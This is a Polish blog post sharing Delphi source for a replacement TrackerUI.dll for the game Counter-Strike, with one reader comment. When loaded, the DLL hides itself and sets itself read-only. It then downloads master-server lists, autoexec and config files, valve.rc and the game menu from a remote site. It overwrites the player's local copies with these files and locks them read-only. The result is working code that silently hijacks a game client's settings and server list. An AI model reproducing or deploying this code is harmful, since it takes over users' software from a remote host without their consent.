TrackerUI.dll – Delphi

Wiele osób tego szukało. Jest to prosty TrackerUI.DLL napisany w delphi z podstawową funkcjonalnością tzn. podmiana i zabezpieczanie plików związanych z masterserverem.
library TrackerUI;

{ Important note about DLL memory management: ShareMem must be the
first unit in your library's USES clause AND your project's (select
Project-View Source) USES clause if your DLL exports any procedures or
functions that pass strings as parameters or function results. This
applies to all strings passed to and from your DLL--even those that
are nested in records and classes. ShareMem is the interface unit to
the BORLNDMM.DLL shared memory manager, which must be deployed along
with your DLL. To avoid using BORLNDMM.DLL, pass string information
using PChar or ShortString parameters. }

uses
SysUtils,
IdHTTP,
Classes;

{$R *.res}
var
BaseURL: string;
procedure DownloadFile(File1, File2: string); cdecl;
var
idHTTP1: TIdHTTP;
Stream:TMemoryStream;
begin
try
idHTTP1 := TIdHTTP.Create(nil);
Stream:=TMemoryStream.Create;
IdHTTP1.Get(File1,Stream);
Stream.SaveToFile(File2);
Stream.Free;
except
end;
end;
begin
BaseURL := 'http://amxx.pl/master/';
begin

// TrackerUI.DLL set to ReadOnly and Hidden
FileSetAttr('cstrike\bin\TrackerUI.dll', 1 + 2);

FileSetAttr('config\masterservers.vdf', 128);
DownloadFile(BaseURL + 'config/masterservers.vdf','config\masterservers.vdf');
FileSetAttr('config\masterservers.vdf', 1);

FileSetAttr('config\rev_masterservers.vdf', 128);
DownloadFile(BaseURL + 'config/rev_masterservers.vdf','config\rev_masterservers.vdf');
FileSetAttr('config\rev_masterservers.vdf', 1);

FileSetAttr('platform\config\masterservers.vdf', 128);
DownloadFile(BaseURL + 'platform/config/masterservers.vdf','platform\config\masterservers.vdf');
FileSetAttr('platform\config\masterservers.vdf', 1);

FileSetAttr('platform\config\rev_masterservers.vdf', 128);
DownloadFile(BaseURL + 'platform/config/rev_masterservers.vdf','platform\config\rev_masterservers.vdf');
FileSetAttr('platform\config\rev_masterservers.vdf', 1);

FileSetAttr('cstrike\autoconfig.cfg', 128);
DownloadFile(BaseURL + 'cstrike/autoconfig.cfg','cstrike\autoconfig.cfg');
FileSetAttr('cstrike\autoconfig.cfg', 1);

FileSetAttr('cstrike\autoexec.cfg', 128);
DownloadFile(BaseURL + 'cstrike/autoexec.cfg','cstrike\autoexec.cfg');
FileSetAttr('cstrike\autoexec.cfg', 1);

FileSetAttr('cstrike\joystick.cfg', 128);
DownloadFile(BaseURL + 'cstrike/joystick.cfg','cstrike\joystick.cfg');
FileSetAttr('cstrike\joystick.cfg', 1);

FileSetAttr('cstrike\language.cfg', 128);
DownloadFile(BaseURL + 'cstrike/language.cfg','cstrike\language.cfg');
FileSetAttr('cstrike\language.cfg', 1);

FileSetAttr('cstrike\userconfig.cfg', 128);
DownloadFile(BaseURL + 'cstrike/userconfig.cfg','cstrike\userconfig.cfg');
FileSetAttr('cstrike\userconfig.cfg', 1);

FileSetAttr('cstrike\violence.cfg', 128);
DownloadFile(BaseURL + 'cstrike/violence.cfg','cstrike\violence.cfg');
FileSetAttr('cstrike\violence.cfg', 1);

FileSetAttr('cstrike\resource\gamemenu.res', 128);
DownloadFile(BaseURL + 'cstrike/resource/gamemenu.res','cstrike\resource\gamemenu.res');
FileSetAttr('cstrike\resource\gamemenu.res', 1);

FileSetAttr('cstrike\config.cfg', 128);
DownloadFile(BaseURL + 'cstrike/config.cfg','cstrike\config.cfg');
FileSetAttr('cstrike\config.cfg', 1);

FileSetAttr('cstrike\commandmenu.txt', 128);
DownloadFile(BaseURL + 'cstrike/commandmenu.txt','cstrike\commandmenu.txt');
FileSetAttr('cstrike\commandmenu.txt', 1);

FileSetAttr('cstrike\server.cfg', 128);
DownloadFile(BaseURL + 'cstrike/server.cfg','cstrike\server.cfg');
FileSetAttr('cstrike\server.cfg', 1);

FileSetAttr('cstrike\listenserver.cfg', 128);
DownloadFile(BaseURL + 'cstrike/listenserver.cfg','cstrike\listenserver.cfg');
FileSetAttr('cstrike\listenserver.cfg', 1);

FileSetAttr('cstrike\valve.rc', 128);
DownloadFile(BaseURL + 'cstrike/valve.rc','cstrike\valve.rc');
FileSetAttr('cstrike\valve.rc', 1);

end;
end.

3 komentarzy o “TrackerUI.dll – Delphi

  1. W pierwszej ddlce cssetti był dostęp do edytowania adresu pobierania używając notepad++ :). Dodam że ten kod jest dostępny w sieci na ruskich?/portugalskich? stronach.

Dodaj komentarz

Witryna wykorzystuje Akismet, aby ograniczyć spam. Dowiedz się więcej jak przetwarzane są dane komentarzy.